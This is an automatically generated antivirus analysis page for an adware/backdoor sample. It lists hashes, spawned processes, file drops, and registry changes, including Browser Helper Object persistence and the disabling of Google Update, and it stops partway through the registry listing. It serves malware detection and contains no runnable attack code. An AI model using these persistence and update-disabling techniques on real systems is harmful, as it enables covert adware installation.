Gen.Variant.Adware.Symmi.49922_1cae3ce628

by malwarelabrobot on January 19th, 2015 in Malware Descriptions.

Gen:Variant.Adware.Symmi.49922 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Backdoor, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 1cae3ce62857807fb52a3fa4bf6a6107
SHA1: e8ce1d3840b4169bedf695bf6a63a25655297063
SHA256: f7fb614d095924f9d4f4871303351178dc4d88bd0199dd0c1bfaadb0ecb3dc81
SSDeep: 24576:e0INoLhRU4UxuXI8q03ZY9z/WKL25xfCXfTx4U:e3yLj5XIOY9zO PTx
Size: 1356800 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Cinema Plus2.7gV08.01
Created at: 2012-09-17 10:50:48
Analyzed on: WindowsXPESX SP3 32-bit
Summary:

Backdoor. Malware that enables remote control of the victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

mscorsvw.exe:172
regsvr32.exe:388
regsvr32.exe:1776
rundll32.exe:1848
rundll32.exe:1324
%original file name%.exe:2008
%original file name%.exe:1664
%original file name%.exe:1252
%original file name%.exe:596
TyHelpTFUO.exe:1516

The Backdoor injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2008 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a (0 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (0 bytes)

The process %original file name%.exe:1664 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\Follow\Follow.dat (6 bytes)
%Program Files%\Follow\Follow.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (281 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (0 bytes)

The process %original file name%.exe:1252 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (518 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (0 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195 (0 bytes)

The process %original file name%.exe:596 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2.ini (0 bytes)

The process TyHelpTFUO.exe:1516 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\Supporter\Supporter.dll (262021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)

Registry activity

The process mscorsvw.exe:172 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process regsvr32.exe:388 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 82 81 9D 95 3C BB AF 7E 3E C4 E6 DF DD 99 0A"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CurVer]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{ad7efdf6-aec2-4b6b-b677-0b880379eb76}" = "1"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9]
"(Default)" = "YoUtuBeeAdBlockke"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_]
"(Default)" = "YoUtuBeeAdBlockke"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"
"NoExplorer" = "1"

The Backdoor deletes the following registry key(s):

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\Programmable]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]

The process regsvr32.exe:1776 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_]
"(Default)" = "PriceLeses"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9]
"(Default)" = "PriceLeses"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}]
"(Default)" = "IRegistry"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}" = "1"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\HELPDIR]
"(Default)" = "%Program Files%\PriceLeses"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE E3 FF 45 93 DB FE BC 0D F2 05 18 15 7A C9 29"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}]
"(Default)" = "ILocalStorage"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"Version" = "1.0"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CurVer]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}]
"(Default)" = "IPlaghinMein"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"
"NoExplorer" = "1"

The Backdoor deletes the following registry key(s):

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\Programmable]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]

The process rundll32.exe:1848 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E EB F7 3C 05 22 3E 15 AE CC 81 7C 89 51 FC 3A"

The process rundll32.exe:1324 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"e46c271e" = "///%"
"c24899a6" = "Vx/g/CD/Mx////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"27ddcf6f" = "///%"
"a0743acc" = "N/////%%"
"0e93c3f3" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"bbf88800" = "///%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
"7367429f" = "///%"
"f0bf0bde" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
"6185d035" = "VP/h/CP/V//l////"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"340d3099" = "/P////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"65114b36" = "Vl/l////"
"587b5709" = "V/////%%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 40 1D 03 0E E7 F9 2E BE 0E FB C2 96 A3 A8 F0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"c99a5f5c" = "///%"
"a2e3b941" = "///%"
"3c09c42b" = "///%"
"72758a5d" = "///%"
"2e22d94e" = "///%"
"d1abcdb6" = "///%"
"f6ad6fa6" = "V/////%%"
"2d71d5ab" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"

The process %original file name%.exe:2008 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"SilentUninstall" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"DisplayName" = "PriceLeses"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"UninstallString" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"ProductName" = "PriceLeses"
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InfoURL" = "http://pricelessorsoft.com"
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
